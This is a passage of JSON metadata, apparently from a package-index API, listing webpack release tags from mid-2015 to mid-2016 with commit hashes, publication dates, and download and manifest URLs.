/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1